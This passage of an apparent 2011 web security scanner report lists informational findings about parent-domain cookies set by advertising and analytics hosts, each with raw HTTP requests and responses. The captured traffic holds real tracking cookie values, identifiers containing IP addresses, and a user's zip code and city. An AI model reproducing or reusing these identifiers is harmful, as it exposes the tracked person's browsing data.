Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.25. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalauto&d.x=123478899&d.t=page&d.u=http%3A%2F%2Fhome.autos.msn.com%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://home.autos.msn.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 18:41:30 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 18:41:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.26. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p92429851&c3=296638382&c4=200925855&c5=1&c6=1&c7=Tue%20Apr%2026%2018%3A36%3A13%202011&c8=http%3A%2F%2Fview.atdmt.com%2FNYC%2Fiview%2F296638382%2Fdirect%3B%3Bwi.300%3Bhi.250%2F01%3Fclick%3D&c9=BND_Trapeze2011_FL_300x250_RV2_MSN_IFR.tpl&c10=&c15=&1303842985472 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_G=method->-1,ts->1303842973; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 26 Apr 2011 18:36:16 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Thu, 25-Apr-2013 18:36:16 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.27. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU2 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Fri, 20-Apr-2012 21:46:55 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; Domain=.contextweb.com; Expires=Wed, 30-Mar-2016 21:46:55 GMT; Path=/
Content-Type: image/gif
Date: Tue, 26 Apr 2011 21:46:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

13.28. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=48027945&bapid=11748&uid=560800 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; vsd=0@1@4db4c1a2@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 18:46:37 GMT
Set-Cookie: ut="1%3AHcxLCoAgEADQu8zaRaME4W2UDKJh8hOJOt29aPsWb8CtwQ44QqtnXgtYKLpkFIxtYxYniFdXKZleBdNiMokWnFWhQPSJZ4qCMoEC75hD3v8EnucF"; path=/; domain=.adbrite.com; expires=Fri, 23-Apr-2021 18:46:37 GMT
Set-Cookie: vsd=0@1@4db7130d@a.rfihub.com; path=/; domain=.adbrite.com; expires=Thu, 28-Apr-2011 18:46:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 26 Apr 2011 18:46:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.29. http://c.atdmt.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&RedC=c.msn.com&MXFR=B506C07761D7465D924574124E3C14DF HTTP/1.1
Host: c.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&MUID=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; domain=.atdmt.com; expires=Sat, 12-Nov-2011 18:35:33 GMT; path=/;
Date: Tue, 26 Apr 2011 18:35:33 GMT
Content-Length: 0


13.30. http://c.homestore.com/srv/oreo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.homestore.com
Path:   /srv/oreo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /srv/oreo?c.realtor.com HTTP/1.1
Host: c.homestore.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 18:46:19 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c652c36_R_63:10.160.4.250:369843579958:R; Domain=.homestore.com; Expires=Fri, 02-Jan-2043 20:32:59 GMT; Path=/
Location: http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R
Content-Length: 225
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

<html><head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R">here<
...[SNIP]...

13.31. http://c.live.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.live.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15501&wlxid=ea42cfe4-9b1a-4293-9276-b9fa57650771&reqid=0014ddf8c55&csiperf=nostart&r=0.7512656508479267 HTTP/1.1
Host: c.live.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/windows-live-messenger?os=other
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; xid=ea42cfe4-9b1a-4293-9276-b9fa57650771&&TK2xxxxxxxxLP11&154; xidseq=1; mktstate=S=1623281324&U=&E=&P=&B=en-us; mkt1=norm=en-us; wlexpid=ea42cfe4-9b1a-4293-9276-b9fa57650771; wlv=A|_-d:s*s449Bg.2+1+0+3; E=P:aEefTVjSzYg=:GbI7jyce+ASXkK6Lz5dzEj3wxAVVXrTJiiazZaS199c=:F; wla42=; BP=VID=0.9254&VC=0&RC=1&LTT=1303843145271&l=WSC.Explore&FR=&ST=; LD=ea42cfe4-9b1a-4293-9276-b9fa57650771_0014ddf8c55_15501_1303843132949=L12308

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15501&wlxid=ea42cfe4-9b1a-4293-9276-b9fa57650771&reqid=0014ddf8c55&csiperf=nostart&r=0.7512656508479267&RedC=c.live.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.live.com; expires=Sat, 12-Nov-2011 18:38:57 GMT; path=/;
Date: Tue, 26 Apr 2011 18:38:57 GMT
Content-Length: 0


13.32. http://c.msn.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.msn.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067 HTTP/1.1
Host: c.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&RedC=c.msn.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.msn.com; expires=Sat, 12-Nov-2011 18:35:31 GMT; path=/;
Date: Tue, 26 Apr 2011 18:35:30 GMT
Content-Length: 0


13.33. http://c.realtor.com/srv/sugar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.realtor.com
Path:   /srv/sugar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /srv/sugar?hsid=561c65cde6_R_a8:10.160.4.250:369843621350:R HTTP/1.1
Host: c.realtor.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:22 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c65cde6_R_a8:10.160.4.250:369843621350:R; Domain=.realtor.com; Expires=Fri, 02-Jan-2043 20:33:02 GMT; Path=/
nnCoection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.34. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=162&g=20&a=313&s=1&l=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; ZFFAbh=845B826,20|1117_846#366Z798_845#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: FFAbh=847B162,20|313_1#365;expires=Wed, 25 Apr 2012 22:05:53 GMT;domain=.zedo.com;path=/;
ETag: "85ecfbee-7054-49420a02cd680"
X-Varnish: 1708187920 1708184115
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30394
Expires: Wed, 27 Apr 2011 06:32:27 GMT
Date: Tue, 26 Apr 2011 22:05:53 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

13.35. http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbglobal.112.2o7.net
Path:   /b/ss/cbglobal/1/H.20.3/s62270389322657

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/cbglobal/1/H.20.3/s62270389322657?AQB=1&ndh=1&t=26/3/2011%2013%3A40%3A59%202%20300&pageName=www.careerbuilder.com/iframe/recommendedcvupload.aspx&g=http%3A//www.careerbuilder.com/iframe/recommendedcvupload.aspx%3Fpagever%3DNewMSN&r=http%3A//msn.careerbuilder.com/msn/default.aspx&cc=USD&server=www&events=event18%2Cevent19&v11=NotRegistered&v15=NO_NotRegistered&c35=New&v35=New&c36=1&v36=1&c37=First%20Visit&v37=First%20Visit&c40=1%3A30PM&v40=1%3A30PM&c41=Tuesday&v41=Tuesday&c42=Weekday&v42=Weekday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=290&bh=220&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cbglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.careerbuilder.com/iframe/recommendedcvupload.aspx?pagever=NewMSN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:41:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_kjodgjid=[CS]v4|0-0|4DB711BE[CE]; Expires=Sun, 24 Apr 2016 18:41:02 GMT; Domain=.2o7.net; Path=/
Location: http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657?AQB=1&pccr=true&&ndh=1&t=26/3/2011%2013%3A40%3A59%202%20300&pageName=www.careerbuilder.com/iframe/recommendedcvupload.aspx&g=http%3A//www.careerbuilder.com/iframe/recommendedcvupload.aspx%3Fpagever%3DNewMSN&r=http%3A//msn.careerbuilder.com/msn/default.aspx&cc=USD&server=www&events=event18%2Cevent19&v11=NotRegistered&v15=NO_NotRegistered&c35=New&v35=New&c36=1&v36=1&c37=First%20Visit&v37=First%20Visit&c40=1%3A30PM&v40=1%3A30PM&c41=Tuesday&v41=Tuesday&c42=Weekday&v42=Weekday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=290&bh=220&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 18:41:02 GMT
Last-Modified: Wed, 27 Apr 2011 18:41:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www425
Content-Length: 0
Content-Type: text/plain


13.36. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166?AQB=1&ndh=1&t=26/3/2011%2017%3A7%3A34%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=randomhouse&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 22:07:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DBA10E851D3D23-40000132600C21AF[CE]; Expires=Sun, 24 Apr 2016 22:07:25 GMT; Domain=.randomhouse.com; Path=/
Location: http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166?AQB=1&pccr=true&vidn=26DBA10E851D3D23-40000132600C21AF&&ndh=1&t=26/3/2011%2017%3A7%3A34%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=randomhouse&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 22:07:25 GMT
Last-Modified: Wed, 27 Apr 2011 22:07:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www347
Content-Length: 0
Content-Type: text/plain


13.37. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhrollup/1/H.22.1/s74779692005831

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ranhrollup/1/H.22.1/s74779692005831?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A6%3A2%202%20300&ns=randomhouse&pageName=RH.com%20Homepage&g=http%3A%2F%2Fwww.randomhouse.com%2F&cc=USD&events=event8&c24=www.randomhouse.com%2F&v24=www.randomhouse.com%2F&c25=www.randomhouse.com%2F&v25=www.randomhouse.com%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
